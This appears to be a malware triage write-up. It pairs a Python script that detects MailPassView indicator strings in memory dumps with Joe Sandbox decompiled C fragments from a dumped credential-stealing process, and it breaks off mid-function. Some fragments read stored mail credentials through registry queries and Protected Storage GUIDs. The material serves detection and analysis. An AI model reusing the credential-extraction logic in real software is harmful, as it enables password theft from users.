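MAILPASSVIEW_INDICATORS: Dict[str, str] = {
    "window_class": "MailPassView",                  # RegisterClassA / CreateWindowExA class
    "window_title": "Mail PassView",                 # CreateWindowExA caption
    "google_desktop_mailboxes": r"Software\Google\Google Desktop\Mailboxes",
    "gui_font": "MS Sans Serif",                     # CreateFontIndirectA face name
}

# The *A APIs in the dump take narrow strings, but a build may also carry
# wide strings, so both encodings are searched.
ENCODINGS = ("ascii", "utf-16-le")

Hit = Tuple[str, str, int]  # (indicator name, encoding, byte offset)


def find_indicators(blob: bytes) -> List[Hit]:
    """Return every occurrence of an indicator string in blob, sorted by offset."""
    hits: List[Hit] = []
    for name, text in MAILPASSVIEW_INDICATORS.items():
        for enc in ENCODINGS:
            needle = text.encode(enc)
            start = 0
            while (off := blob.find(needle, start)) >= 0:
                hits.append((name, enc, off))
                start = off + 1
    return sorted(hits, key=lambda h: h[2])


def classify(blob: bytes) -> Dict[str, object]:
    """Summarise which indicators are present and whether they point at MailPassView."""
    hits = find_indicators(blob)
    found = sorted({h[0] for h in hits})
    return {
        "hits": hits,
        "indicators": found,
        "distinct_indicators": len(found),
        # Class name and caption together are specific to MailPassView's
        # window-registration routine.  The registry path or the font name on
        # their own are weak evidence: a legitimate Google Desktop component or
        # any ordinary dialog could carry them.
        "likely_mailpassview": {"window_class", "window_title"} <= set(found),
    }


def build_sample_blob() -> bytes:
    """Constructed stand-in for a dumped image; not bytes from the real sample."""
    return (
        b"\x00" * 16
        + b"MailPassView\x00"                                        # ASCII, offset 16
        + b"\x00" * 8
        + b"Mail PassView\x00"                                       # ASCII, offset 37
        + b"\x00" * 32
        + rb"Software\Google\Google Desktop\Mailboxes" + b"\x00"     # ASCII, offset 83
        + "MS Sans Serif".encode("utf-16-le") + b"\x00\x00"          # UTF-16LE, offset 124
    )


if __name__ == "__main__":
    # Usage: python mpv_triage.py <unpacked_pe_or_memory_dump>; with no
    # argument the constructed sample blob is scanned instead.
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_sample_blob()
    report = classify(data)
    for name, enc, off in report["hits"]:
        print(f"{off:#010x}  {enc:<9}  {name}")
    print("distinct indicators:", report["distinct_indicators"],
          "| likely MailPassView:", report["likely_mailpassview"])
```

Point it at the unpacked memory image (here the 0x00400000 region dumped from process 15) rather than at the on-disk dropper: a packed stage does not expose these strings in clear, which is also why the report ties them to the memory dump and not to the submitted file.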

                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                    			E00401085(void* __esi, void* __eflags) {
                                                                                                                                                    				struct tagLOGFONTA _v64;
                                                                                                                                                    				int _t10;
                                                                                                                                                    				long _t11;
                                                                                                                                                    
                                                                                                                                                     				E00406191( &_v64, "MS Sans Serif", 0xa, 1); // @ 0x00401098
                                                                                                                                                     				_t10 = CreateFontIndirectA( &_v64); // @ 0x004010a4
                                                                                                                                                     				 *(__esi + 0x20c) = _t10; // @ 0x004010bd
                                                                                                                                                     				_t11 = SendDlgItemMessageA( *(__esi + 4), 0x3ec, 0x30, _t10, 0); // @ 0x004010c3
                                                                                                                                                     				if( *0x417388 != 0) { // @ 0x004010cc
                                                                                                                                                     					return SendDlgItemMessageA( *(__esi + 4), 0x3ee, 0x30,  *(__esi + 0x20c), 0); // @ 0x00000000
                                                                                                                                                     				} // @ 0x004010e0
                                                                                                                                                     				return _t11; // @ 0x004010e4
                                                                                                                                                     			}

                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00406191: memset.MSVCRT ref: 0040619B
                                                                                                                                                      • Part of subcall function 00406191: strcpy.MSVCRT(?,00000000,?,00000000,0000003C,00000000,?,00406269,Arial,0000000E,00000000), ref: 004061DB
                                                                                                                                                    • CreateFontIndirectA.GDI32(?), ref: 004010A4
                                                                                                                                                    • SendDlgItemMessageA.USER32(?,000003EC,00000030,00000000,00000000), ref: 004010C3
                                                                                                                                                    • SendDlgItemMessageA.USER32(?,000003EE,00000030,?,00000000), ref: 004010E0
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                     • Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ItemMessageSend$CreateFontIndirectmemsetstrcpy
                                                                                                                                                    • String ID: MS Sans Serif
                                                                                                                                                    • API String ID: 4251605573-168460110
                                                                                                                                                    • Opcode ID: a5c1b06fa8ac567c51537cce04f23f48b3e0294f7b0701913d9bb68d384747bd
                                                                                                                                                    • Instruction ID: 11d026e54a5ae2454c64c325e08d9e616df03e05f7163fa19ba200447038793b
                                                                                                                                                    • Opcode Fuzzy Hash: a5c1b06fa8ac567c51537cce04f23f48b3e0294f7b0701913d9bb68d384747bd
                                                                                                                                                    • Instruction Fuzzy Hash: 73F0A775A8034877E72167A0ED47F8A7BACAB40B00F10C135FB61B51E1D6F47554DB58
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                    			E0040DE43(void** __eax, struct HWND__* _a4) {
                                                                                                                                                    				int _t6;
                                                                                                                                                    				void** _t10;
                                                                                                                                                    
                                                                                                                                                    				_t10 = __eax;
                                                                                                                                                    				if( *0x417510 == 0) {
                                                                                                                                                    					memcpy(0x416e70,  *__eax, 0x50);
                                                                                                                                                    					memcpy(0x416ba0,  *(_t10 + 4), 0x2cc);
                                                                                                                                                    					 *0x417510 = 1;
                                                                                                                                                    					_t6 = DialogBoxParamA( *0x416b94, 0x6b, _a4, E0040DB39, 0);
                                                                                                                                                    					 *0x417510 =  *0x417510 & 0x00000000;
                                                                                                                                                    					 *0x416b9c = _t6;
                                                                                                                                                    					return 1;
                                                                                                                                                    				} else {
                                                                                                                                                    					return 1;
                                                                                                                                                    				}
                                                                                                                                                    			}
Instruction addresses (one per statement, in the report's listing order): 0x0040de4b, 0x0040de4d, 0x0040de5d, 0x0040de6f, 0x0040de8d, 0x0040de93, 0x0040de99, 0x0040dea0, 0x0040dea8, 0x0040de4f, 0x0040de53, 0x0040de53

                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: memcpy$DialogParam
                                                                                                                                                    • String ID: V7
                                                                                                                                                    • API String ID: 392721444-2959985473
                                                                                                                                                    • Opcode ID: 5e9eade56f70dddb9201fe9d43162507361263185449feca73d32e9d96fafbc6
                                                                                                                                                    • Instruction ID: 1a8743d5fef8bbef7923f2c95fec7d45d4f15d0a806a7122114c86eec2fd18b9
                                                                                                                                                    • Opcode Fuzzy Hash: 5e9eade56f70dddb9201fe9d43162507361263185449feca73d32e9d96fafbc6
                                                                                                                                                    • Instruction Fuzzy Hash: 93F0A7716843207BD7116F54AC06BC63BF2B704B5AF114926F149E40E1D3F56550CBCC
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    C-Code - Quality: 58%
                                                                                                                                                    			E004062D1(struct HWND__* _a4) {
                                                                                                                                                    				void _v259;
                                                                                                                                                    				char _v260;
                                                                                                                                                    				signed int _t10;
                                                                                                                                                    
                                                                                                                                                    				_v260 = 0;
                                                                                                                                                    				memset( &_v259, 0, 0xff);
                                                                                                                                                    				GetClassNameA(_a4,  &_v260, 0xff);
                                                                                                                                                    				_t10 =  &_v260;
                                                                                                                                                    				_push("edit");
                                                                                                                                                    				_push(_t10);
                                                                                                                                                    				L004115B2();
                                                                                                                                                    				asm("sbb eax, eax");
                                                                                                                                                    				return  ~_t10 + 1;
                                                                                                                                                    			}
Instruction addresses (one per statement, in the report's listing order): 0x004062ea, 0x004062f1, 0x00406304, 0x0040630a, 0x00406310, 0x00406315, 0x00406316, 0x0040631f, 0x00406324

                                                                                                                                                    APIs
                                                                                                                                                    • memset.MSVCRT ref: 004062F1
                                                                                                                                                    • GetClassNameA.USER32(?,00000000,000000FF), ref: 00406304
                                                                                                                                                    • _stricmp.MSVCRT(00000000,edit), ref: 00406316
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ClassName_stricmpmemset
                                                                                                                                                    • String ID: edit
                                                                                                                                                    • API String ID: 3665161774-2167791130
                                                                                                                                                    • Opcode ID: f6364a9e82c342bcd76c39a965b38e05be617d7d52f0a224c2f99095176bc218
                                                                                                                                                    • Instruction ID: 6efc07277a00def775dca084f59963aaad452a70fda198cb5006c56c80a8bddd
                                                                                                                                                    • Opcode Fuzzy Hash: f6364a9e82c342bcd76c39a965b38e05be617d7d52f0a224c2f99095176bc218
                                                                                                                                                    • Instruction Fuzzy Hash: 75E09BB3C4412A7ADB21A764DC05FE53BAC9F59305F0001B6BD46E10D5E5B497C887A5
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                    			E0040EDAC() {
                                                                                                                                                    				struct HINSTANCE__* _t1;
                                                                                                                                                    				_Unknown_base(*)()* _t2;
                                                                                                                                                    
                                                                                                                                                    				if( *0x417520 == 0) {
                                                                                                                                                    					_t1 = LoadLibraryA("shell32.dll");
                                                                                                                                                    					 *0x417520 = _t1;
                                                                                                                                                    					if(_t1 != 0) {
                                                                                                                                                    						_t2 = GetProcAddress(_t1, "SHGetSpecialFolderPathA");
                                                                                                                                                    						 *0x41751c = _t2;
                                                                                                                                                    						return _t2;
                                                                                                                                                    					}
                                                                                                                                                    				}
                                                                                                                                                    				return _t1;
                                                                                                                                                    			}
Instruction addresses (one per statement, in the report's listing order): 0x0040edb3, 0x0040edba, 0x0040edc2, 0x0040edc7, 0x0040edcf, 0x0040edd5, 0x00000000, 0x0040edd5, 0x0040edc7, 0x0040edda

                                                                                                                                                    APIs
                                                                                                                                                    • LoadLibraryA.KERNEL32(shell32.dll,0040B9D8,75144DE0,?,00000000), ref: 0040EDBA
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathA), ref: 0040EDCF
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AddressLibraryLoadProc
                                                                                                                                                    • String ID: SHGetSpecialFolderPathA$shell32.dll
                                                                                                                                                    • API String ID: 2574300362-543337301
                                                                                                                                                    • Opcode ID: 8c8e9a4ff32791e3d6bd34cb9d8ce11c35f1ef255cc83771f6bc322d1b4004da
                                                                                                                                                    • Instruction ID: 9298da647e7f97f850720a93b521a1101e1548fa407b312faad19db7241a3124
                                                                                                                                                    • Opcode Fuzzy Hash: 8c8e9a4ff32791e3d6bd34cb9d8ce11c35f1ef255cc83771f6bc322d1b4004da
                                                                                                                                                    • Instruction Fuzzy Hash: 4BD0C970649202EFC7008F21AE097813ABABB18703F10C537A506E1AA0F7B88190CF5C
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    C-Code - Quality: 87%
                                                                                                                                                    			E0040FE05(intOrPtr* __esi, void* __eflags) {
                                                                                                                                                    				void* _t27;
                                                                                                                                                    				intOrPtr _t28;
                                                                                                                                                    				intOrPtr* _t29;
                                                                                                                                                    				intOrPtr* _t44;
                                                                                                                                                    
                                                                                                                                                    				_t44 = __esi;
                                                                                                                                                    				 *__esi = 0x414288;
                                                                                                                                                    				_t27 = E00406549(0x46c, __esi);
                                                                                                                                                    				_push(0x20);
                                                                                                                                                    				L004115D0();
                                                                                                                                                    				if(_t27 == 0) {
                                                                                                                                                    					_t28 = 0;
                                                                                                                                                    				} else {
                                                                                                                                                    					_t28 = E00406A2C(_t27);
                                                                                                                                                    				}
                                                                                                                                                    				_push(0x20);
                                                                                                                                                    				 *((intOrPtr*)(_t44 + 0x450)) = _t28;
                                                                                                                                                    				L004115D0();
                                                                                                                                                    				if(_t28 == 0) {
                                                                                                                                                    					_t29 = 0;
                                                                                                                                                    				} else {
                                                                                                                                                    					_t29 = E00406A2C(_t28);
                                                                                                                                                    				}
                                                                                                                                                    				_push(0x14);
                                                                                                                                                    				 *((intOrPtr*)(_t44 + 0x454)) = _t29;
                                                                                                                                                    				L004115D0();
                                                                                                                                                    				if(_t29 == 0) {
                                                                                                                                                    					_t29 = 0;
                                                                                                                                                    				} else {
                                                                                                                                                    					 *((intOrPtr*)(_t29 + 0xc)) = 0;
                                                                                                                                                    					 *_t29 = 0;
                                                                                                                                                    					 *((intOrPtr*)(_t29 + 4)) = 0;
                                                                                                                                                    					 *((intOrPtr*)(_t29 + 0x10)) = 0x100;
                                                                                                                                                    					 *((intOrPtr*)(_t29 + 8)) = 0;
                                                                                                                                                    				}
                                                                                                                                                    				_push(0x14);
                                                                                                                                                    				 *((intOrPtr*)(_t44 + 0x458)) = _t29;
                                                                                                                                                    				L004115D0();
                                                                                                                                                    				if(_t29 == 0) {
                                                                                                                                                    					_t29 = 0;
                                                                                                                                                    				} else {
                                                                                                                                                    					 *((intOrPtr*)(_t29 + 0xc)) = 0;
                                                                                                                                                    					 *_t29 = 0;
                                                                                                                                                    					 *((intOrPtr*)(_t29 + 4)) = 0;
                                                                                                                                                    					 *((intOrPtr*)(_t29 + 0x10)) = 0x100;
                                                                                                                                                    					 *((intOrPtr*)(_t29 + 8)) = 0;
                                                                                                                                                    				}
                                                                                                                                                    				_push(0x14);
                                                                                                                                                    				 *((intOrPtr*)(_t44 + 0x45c)) = _t29;
                                                                                                                                                    				L004115D0();
                                                                                                                                                    				if(_t29 == 0) {
                                                                                                                                                    					_t29 = 0;
                                                                                                                                                    				} else {
                                                                                                                                                    					 *((intOrPtr*)(_t29 + 0xc)) = 0;
                                                                                                                                                    					 *_t29 = 0;
                                                                                                                                                    					 *((intOrPtr*)(_t29 + 4)) = 0;
                                                                                                                                                    					 *((intOrPtr*)(_t29 + 0x10)) = 0x100;
                                                                                                                                                    					 *((intOrPtr*)(_t29 + 8)) = 0;
                                                                                                                                                    				}
                                                                                                                                                    				 *((intOrPtr*)(_t44 + 0x460)) = _t29;
                                                                                                                                                    				 *((intOrPtr*)( *((intOrPtr*)(_t44 + 0x450)) + 0x14)) = 0x2000;
                                                                                                                                                    				 *((intOrPtr*)( *((intOrPtr*)(_t44 + 0x454)) + 0x14)) = 0x2000;
                                                                                                                                                    				 *((intOrPtr*)(_t44 + 0x3c)) = 1;
                                                                                                                                                    				 *((intOrPtr*)(_t44 + 0x40)) = 1;
                                                                                                                                                    				 *((intOrPtr*)(_t44 + 0x44)) = 1;
                                                                                                                                                    				 *((intOrPtr*)(_t44 + 0x48)) = 1;
                                                                                                                                                    				return _t44;
                                                                                                                                                    			}


                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ??2@$memset
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1860491036-0
                                                                                                                                                    • Opcode ID: 7c91cc0c080fd5bb70578688ba928cc39a2670361b6ddd4e2d1e90fb004bc48b
                                                                                                                                                    • Instruction ID: d938b1c2a289ef47e5423cea375f2860c04713c819a512dfc676868f3ea794ac
                                                                                                                                                    • Opcode Fuzzy Hash: 7c91cc0c080fd5bb70578688ba928cc39a2670361b6ddd4e2d1e90fb004bc48b
                                                                                                                                                    • Instruction Fuzzy Hash: CC3146B0A107008FD7609F3AD845666FBE4EF80355F25887FD20ADB6B2E7B8D4448B59
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                    			E0040BD0B(void* __edi, void* __esi, void* _a4) {
                                                                                                                                                    				signed int _t13;
                                                                                                                                                    				signed int _t25;
                                                                                                                                                    				int _t26;
                                                                                                                                                    				char* _t30;
                                                                                                                                                    				void* _t31;
                                                                                                                                                    				void* _t33;
                                                                                                                                                    				void* _t35;
                                                                                                                                                    
                                                                                                                                                    				_t35 = __esi;
                                                                                                                                                    				_t25 = 0x3f;
                                                                                                                                                    				_t13 =  *(__esi + 0x10) >> 0x00000003 & _t25;
                                                                                                                                                    				_t30 = __esi + 0x18 + _t13;
                                                                                                                                                    				 *_t30 = 0x80;
                                                                                                                                                    				_t26 = _t25 - _t13;
                                                                                                                                                    				_t31 = _t30 + 1;
                                                                                                                                                    				if(_t26 >= 8) {
                                                                                                                                                    					memset(_t31, 0, _t26 + 0xfffffff8);
                                                                                                                                                    				} else {
                                                                                                                                                    					memset(_t31, 0, _t26);
                                                                                                                                                    					_t33 = __esi + 0x18;
                                                                                                                                                    					E0040BD8A(_t33, __esi);
                                                                                                                                                    					memset(_t33, 0, 0x38);
                                                                                                                                                    				}
                                                                                                                                                    				 *((intOrPtr*)(_t35 + 0x50)) =  *((intOrPtr*)(_t35 + 0x10));
                                                                                                                                                    				 *((intOrPtr*)(_t35 + 0x54)) =  *((intOrPtr*)(_t35 + 0x14));
                                                                                                                                                    				E0040BD8A(_t35 + 0x18, _t35);
                                                                                                                                                    				memcpy(_a4, _t35, 0x10);
                                                                                                                                                    				return memset(_t35, 0, 4);
                                                                                                                                                    			}


                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: memset$memcpy
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 368790112-0
                                                                                                                                                    • Opcode ID: 4c1dce2a3317b4880715cd557b1b90e7212d21989bb675327cb4115bdd69e9ea
                                                                                                                                                    • Instruction ID: 14e83d3a51f9c3b731822f35bbce0da2433a64988b134a744f8d54487411a0b4
                                                                                                                                                    • Opcode Fuzzy Hash: 4c1dce2a3317b4880715cd557b1b90e7212d21989bb675327cb4115bdd69e9ea
                                                                                                                                                    • Instruction Fuzzy Hash: 6F01F5B1680B0026D2356B26CC02F9A77A5AFA0714F000B1EF643666D1D7ACE244869C
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                    			E0040246C(void* __eax, void* __ecx, intOrPtr _a4, intOrPtr _a8, char* _a12, intOrPtr _a16) {
                                                                                                                                                    				void _v2058;
                                                                                                                                                    				char _v2060;
                                                                                                                                                    				char _v2069;
                                                                                                                                                    				char _v2070;
                                                                                                                                                    				char _v2071;
                                                                                                                                                    				char _v2072;
                                                                                                                                                    				char _v3086;
                                                                                                                                                    				signed char _v3090;
                                                                                                                                                    				char _v3091;
                                                                                                                                                    				char _v3092;
                                                                                                                                                    				char* _v3096;
                                                                                                                                                    				char _v3100;
                                                                                                                                                    				short* _v3104;
                                                                                                                                                    				int _v3108;
                                                                                                                                                    				char _v3112;
                                                                                                                                                    				void* __ebx;
                                                                                                                                                    				void* _t49;
                                                                                                                                                    				signed int _t61;
                                                                                                                                                    				short* _t76;
                                                                                                                                                    				void* _t83;
                                                                                                                                                    				signed int _t87;
                                                                                                                                                    				void* _t90;
                                                                                                                                                    
                                                                                                                                                    				_t83 = __eax;
                                                                                                                                                    				_t73 = 0;
                                                                                                                                                    				 *_a12 = 0;
                                                                                                                                                    				_v3112 = 0x400;
                                                                                                                                                    				_t49 = E0040EBA3(__ecx, _a4, _a8,  &_v3092,  &_v3112);
                                                                                                                                                    				_t90 = (_t87 & 0xfffffff8) - 0xc28 + 0x10;
                                                                                                                                                    				if(_t49 == 0) {
                                                                                                                                                    					_v2069 = 0;
                                                                                                                                                    					_v2070 = 0;
                                                                                                                                                    					_v2071 = 0;
                                                                                                                                                    					_v2072 = 0;
                                                                                                                                                    					if(_v3092 != 1) {
                                                                                                                                                    						if(_v3092 == 2 &&  *((intOrPtr*)(_t83 + 0xa94)) != 0) {
                                                                                                                                                    							_v3100 = _v3112 - 1;
                                                                                                                                                    							_v3096 =  &_v3091;
                                                                                                                                                    							if(E00404811(_t83 + 0x890,  &_v3100, 0,  &_v3108) != 0) {
                                                                                                                                                    								WideCharToMultiByte(0, 0, _v3104, _v3108, _a12, 0x7f, 0, 0);
                                                                                                                                                    								LocalFree(_v3104);
                                                                                                                                                    							}
                                                                                                                                                    						}
                                                                                                                                                    					} else {
                                                                                                                                                    						if( *((intOrPtr*)(_t83 + 0x888)) != 0) {
                                                                                                                                                    							if(_a16 == 0) {
                                                                                                                                                    								E0040E988(_a12, _t83 + 0x87c,  &_v3090, 0x7f, 0);
                                                                                                                                                    							} else {
                                                                                                                                                    								_v2060 = 0;
                                                                                                                                                    								memset( &_v2058, 0, 0x800);
                                                                                                                                                    								_t90 = _t90 + 0xc;
                                                                                                                                                    								_t76 =  &_v2060;
                                                                                                                                                    								E0040E988(_t76, _t83 + 0x87c,  &_v3091, 0x400, 1);
                                                                                                                                                    								WideCharToMultiByte(0, 0, _t76, 0xffffffff, _a12, 0x7f, 0, 0);
                                                                                                                                                    							}
                                                                                                                                                    							_t73 = 0;
                                                                                                                                                    						}
                                                                                                                                                    						_t79 = _a12;
                                                                                                                                                    						if( *_a12 == _t73 && _v3112 >= 7 && _v3092 == 1 && _v3091 == 1) {
                                                                                                                                                    							_t61 = _v3090 & 0x000000ff;
                                                                                                                                                    							if(_t61 > 1 && _v3112 >= _t61 + 6) {
                                                                                                                                                    								E00401DFD(_t79,  &_v3086, _t61);
                                                                                                                                                    							}
                                                                                                                                                    						}
                                                                                                                                                    					}
                                                                                                                                                    				}
                                                                                                                                                    				return 0 |  *_a12 != _t73;
                                                                                                                                                    			}

                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 0040EBA3: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,004024A0,?), ref: 0040EBB9
                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000,?,?,00000400,00000001), ref: 0040252C
                                                                                                                                                    • memset.MSVCRT ref: 004024F5
                                                                                                                                                      • Part of subcall function 0040E988: UuidFromStringA.RPCRT4(220D5CD0-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 0040E9A5
                                                                                                                                                      • Part of subcall function 0040E988: UuidFromStringA.RPCRT4(417E2D75-84BD-11D0-84BB-00C04FD43F8F,?), ref: 0040E9C6
                                                                                                                                                      • Part of subcall function 0040E988: memcpy.MSVCRT ref: 0040EA04
                                                                                                                                                      • Part of subcall function 0040E988: CoTaskMemFree.OLE32(00000000,00000000), ref: 0040EA13
                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000002,?,0000007F,00000000,00000000,00000002,00000000,?), ref: 004025E4
                                                                                                                                                    • LocalFree.KERNEL32(?), ref: 004025EE
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ByteCharFreeFromMultiStringUuidWide$LocalQueryTaskValuememcpymemset
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3503910906-0
                                                                                                                                                    • Opcode ID: bb52322aa56186edb046b50904625ef5fe77f2ed0f2dccde0d18aa7e90448571
                                                                                                                                                    • Instruction ID: 8b275e149f62785490509d2466391155d2af3f8991a5b00387cc308873e1222d
                                                                                                                                                    • Opcode Fuzzy Hash: bb52322aa56186edb046b50904625ef5fe77f2ed0f2dccde0d18aa7e90448571
                                                                                                                                                    • Instruction Fuzzy Hash: 7041B4B1408384BFD711DB608D44AEBBBDCBB48308F44493EFA98A21D1D678DA54DB5A
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    C-Code - Quality: 98%
                                                                                                                                                    			E0040B3C4(intOrPtr __ecx, intOrPtr _a4, intOrPtr* _a8) {
                                                                                                                                                    				intOrPtr _v8;
                                                                                                                                                    				void _v263;
                                                                                                                                                    				char _v264;
                                                                                                                                                    				void* __edi;
                                                                                                                                                    				void* __esi;
                                                                                                                                                    				signed int _t42;
                                                                                                                                                    				signed int _t45;
                                                                                                                                                    				intOrPtr* _t60;
                                                                                                                                                    				signed char _t62;
                                                                                                                                                    				intOrPtr _t63;
                                                                                                                                                    				int _t65;
                                                                                                                                                    
                                                                                                                                                    				_t61 = __ecx;
                                                                                                                                                    				_t60 = _a8;
                                                                                                                                                    				_t63 = __ecx;
                                                                                                                                                    				_v8 = __ecx;
                                                                                                                                                    				if( *(_t60 + 4) == 0x103 &&  *((intOrPtr*)(_t60 + 8)) == 0xfffffff4) {
                                                                                                                                                    					_t42 = E00408BA0( *((intOrPtr*)(__ecx + 0x370)), _t60);
                                                                                                                                                    					 *((intOrPtr*)(_t63 + 0x10c)) = 1;
                                                                                                                                                    					 *(_t63 + 0x110) = _t42;
                                                                                                                                                    				}
                                                                                                                                                    				if(_a4 == 0x101 &&  *((intOrPtr*)(_t60 + 8)) == 0xfffffffe &&  *((intOrPtr*)(_t60 + 0xc)) == 1) {
                                                                                                                                                    					_v264 = 0;
                                                                                                                                                    					memset( &_v263, 0, 0xff);
                                                                                                                                                    					E00401000(_t61,  &_v264, 0x412440);
                                                                                                                                                    					_t42 = E00406523( *((intOrPtr*)(_v8 + 0x108)),  &_v264);
                                                                                                                                                    					_t63 = _v8;
                                                                                                                                                    				}
                                                                                                                                                    				_t65 = 0;
                                                                                                                                                    				if( *((intOrPtr*)(_t60 + 8)) == 0xfffffdf8) {
                                                                                                                                                    					_t42 = SendMessageA( *(_t63 + 0x118), 0x423, 0, 0);
                                                                                                                                                    					if( *_t60 == _t42) {
                                                                                                                                                    						_t42 = GetMenuStringA( *(_t63 + 0x11c),  *(_t60 + 4), _t60 + 0x10, 0x4f, 0);
                                                                                                                                                    						 *((intOrPtr*)(_t60 + 0x60)) = 0;
                                                                                                                                                    					}
                                                                                                                                                    				}
                                                                                                                                                    				if(_a4 != 0x103) {
                                                                                                                                                    					L27:
                                                                                                                                                    					return _t42;
                                                                                                                                                    				} else {
                                                                                                                                                    					_t80 =  *((intOrPtr*)(_t60 + 8)) - 0xfffffffd;
                                                                                                                                                    					if( *((intOrPtr*)(_t60 + 8)) == 0xfffffffd) {
                                                                                                                                                    						_t42 = E0040AEAA(_t61, _t63, _t63, _t80);
                                                                                                                                                    						_t65 = 0;
                                                                                                                                                    					}
                                                                                                                                                    					if( *((intOrPtr*)(_t60 + 8)) == 0xffffff94) {
                                                                                                                                                    						_t42 = E00408ACB( *(_t60 + 0x10), _t61,  *((intOrPtr*)(_t63 + 0x370)), _t65);
                                                                                                                                                    						_t65 = 0;
                                                                                                                                                    					}
                                                                                                                                                    					if( *((intOrPtr*)(_t60 + 8)) != 0xffffff9b) {
                                                                                                                                                    						goto L27;
                                                                                                                                                    					} else {
                                                                                                                                                    						if( *((intOrPtr*)( *((intOrPtr*)(_t63 + 0x370)) + 0x1b8)) == _t65) {
                                                                                                                                                    							_t62 = 2;
                                                                                                                                                    							_t45 =  *(_t60 + 0x14) & _t62;
                                                                                                                                                    							__eflags = _t45;
                                                                                                                                                    							if(_t45 == 0) {
                                                                                                                                                    								L20:
                                                                                                                                                    								__eflags = _t45 - _t62;
                                                                                                                                                    								if(_t45 == _t62) {
                                                                                                                                                    									L23:
                                                                                                                                                    									_t42 = 0;
                                                                                                                                                    									__eflags = 0;
